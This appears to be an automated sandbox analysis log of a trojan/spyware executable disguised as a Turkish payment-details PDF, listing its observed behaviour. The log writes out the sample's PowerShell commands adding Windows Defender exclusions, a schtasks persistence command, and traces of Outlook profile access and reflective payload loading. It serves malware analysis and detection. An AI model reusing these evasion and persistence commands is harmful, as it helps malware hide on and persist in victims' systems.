                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.428463798.0000000003F91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs #U00d6DEME DETAYLARI_PDF.exe
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.391144282.0000000007D62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameX509Consta.exe6 vs #U00d6DEME DETAYLARI_PDF.exe
                    Source: #U00d6DEME DETAYLARI_PDF.exeBinary or memory string: OriginalFilename vs #U00d6DEME DETAYLARI_PDF.exe
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000009.00000000.415725263.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBXbDcfeeUnpOrEaBmKCQDSJebEJWwohtlb.exe4 vs #U00d6DEME DETAYLARI_PDF.exe
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.625573836.00000000014F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs #U00d6DEME DETAYLARI_PDF.exe
                    Source: #U00d6DEME DETAYLARI_PDF.exeBinary or memory string: OriginalFilenameX509Consta.exe6 vs #U00d6DEME DETAYLARI_PDF.exe
                    Source: #U00d6DEME DETAYLARI_PDF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: OsAcNRt.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: #U00d6DEME DETAYLARI_PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: OsAcNRt.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile read: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeJump to behavior
                    Source: #U00d6DEME DETAYLARI_PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe"
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OsAcNRt.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OsAcNRt" /XML "C:\Users\user\AppData\Local\Temp\tmp9B9E.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OsAcNRt.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OsAcNRt" /XML "C:\Users\user\AppData\Local\Temp\tmp9B9E.tmp
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile created: C:\Users\user\AppData\Roaming\OsAcNRt.exeJump to behavior
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9B9E.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/11@2/1
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeMutant created: \Sessions\1\BaseNamedObjects\EAjnjmheoUcjWGQsKjbIxGInKU
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3676:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_01
                    Source: 9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: #U00d6DEME DETAYLARI_PDF.exeStatic file information: File size 1051136 > 1048576
                    Source: #U00d6DEME DETAYLARI_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: #U00d6DEME DETAYLARI_PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                    Data Obfuscation

                    barindex
                    Source: #U00d6DEME DETAYLARI_PDF.exe, Bx/rJ.cs.Net Code: WT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: OsAcNRt.exe.0.dr, Bx/rJ.cs.Net Code: WT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.c70000.0.unpack, Bx/rJ.cs.Net Code: WT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.#U00d6DEME DETAYLARI_PDF.exe.c70000.0.unpack, Bx/rJ.cs.Net Code: WT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.fb0000.1.unpack, Bx/rJ.cs.Net Code: WT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.fb0000.5.unpack, Bx/rJ.cs.Net Code: WT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.fb0000.13.unpack, Bx/rJ.cs.Net Code: WT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.fb0000.11.unpack, Bx/rJ.cs.Net Code: WT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.fb0000.0.unpack, Bx/rJ.cs.Net Code: WT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.2.#U00d6DEME DETAYLARI_PDF.exe.fb0000.1.unpack, Bx/rJ.cs.Net Code: WT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 0_2_054B01F7 push E802005Eh; retf
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 0_2_064B1670 push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 0_2_064BF628 pushfd ; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 0_2_064BE430 push es; retn 0004h
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 0_2_064B1540 push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 0_2_064BC15E push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651B660 push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651A795 push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651A781 push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA79 push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA11 push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA15 push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA19 push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA1D push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA0D push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA31 push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA21 push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA25 push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA29 push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651AA2D push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651A819 push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651A82D push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651A8C5 push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651A8B1 push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651A949 push ecx; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651A975 push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_06513139 push es; iretd
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651A9C1 push es; ret
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651A9F5 push es; ret
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.96404996685
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.96404996685
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile created: C:\Users\user\AppData\Roaming\OsAcNRt.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OsAcNRt" /XML "C:\Users\user\AppData\Local\Temp\tmp9B9E.tmp
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
